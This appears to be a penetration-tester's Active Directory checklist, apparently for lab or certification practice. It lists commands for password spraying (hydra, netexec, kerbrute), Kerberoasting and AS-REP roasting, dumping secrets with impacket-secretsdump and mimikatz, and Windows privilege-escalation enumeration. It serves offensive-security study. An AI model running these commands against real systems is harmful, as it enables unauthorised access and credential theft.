Penetration Test Checklist

Unauthenticated Recon - Domain


Initial Compromise of Network

Windows Privilege Escalation


Harvested a New Credential

Make sure to test twice. Once for domain and once for "--local-auth" to test local user passwords.

Spray Passwords

  • $ hydra -l "yoshi" -p 'Mushroom!' -M ips.txt rdp
  • $ netexec smb ips.txt -u users.txt -p passwords.txt 
  • $ netexec winrm ips.txt -u users.txt -p passwords.txt
  • $ netexec wmi ips.txt -u users.txt -p passwords.txt 
  • $ netexec mssql ips.txt -u users.txt -p passwords.txt -local-auth

Manual Spray (if above didn't recover anything).

  • $ proxychains evil-winrm -i 10.10.93.154 -u Administrator -p "Passwords"
  • $ proxychains xfreerdp /v:10.10.93.154 /u:Administrator /p:password

Harvested Domain Credential

Kerbrute

  • $ proxychains kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

Kerberoast

  • $ proxychains impacket-GetUserSPNs -request -dc-ip 10.10.113.146 corp.com/web_svc

ASREP Roast

  • $ proxychains impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/pete

Harvest new Hash


Harvested a new Private Key

Spray Intranet (.ssh)

If we have a shell on a box and notice a user has a private key in their home directory, we should test it against all computers with ssh open.


Popped a new Shell

Manual Enumeration

Domain Connected User

Check ACL's/ACE's

PWNED Shell?- Dump Secrets!

  • $ proxychains impacket-secretsdump -hashes ":e728ecbadfb02f51ce8eed753f3ff3fd" [email protected]
  • PS> .\mimikatz.exe

Privilege Escalation - Windows

Automated Enumeration

  • PS> .\winPEASx64.exe
  • PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Manual Enumeration

  • systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Network Card(s)" /C:"Hotfix(s)"
  • whoami /priv
  • net user <user>
  • net localgroup administrators
  • cmd.exe /c dir /a C:\
  • ls "program files"
  • netstat -nao
  • .\SharpHound -c All --domain medtech.com --zipfilename MEDTECH.zip

Active Directory Lateral Movement

Crying for help?

Last updated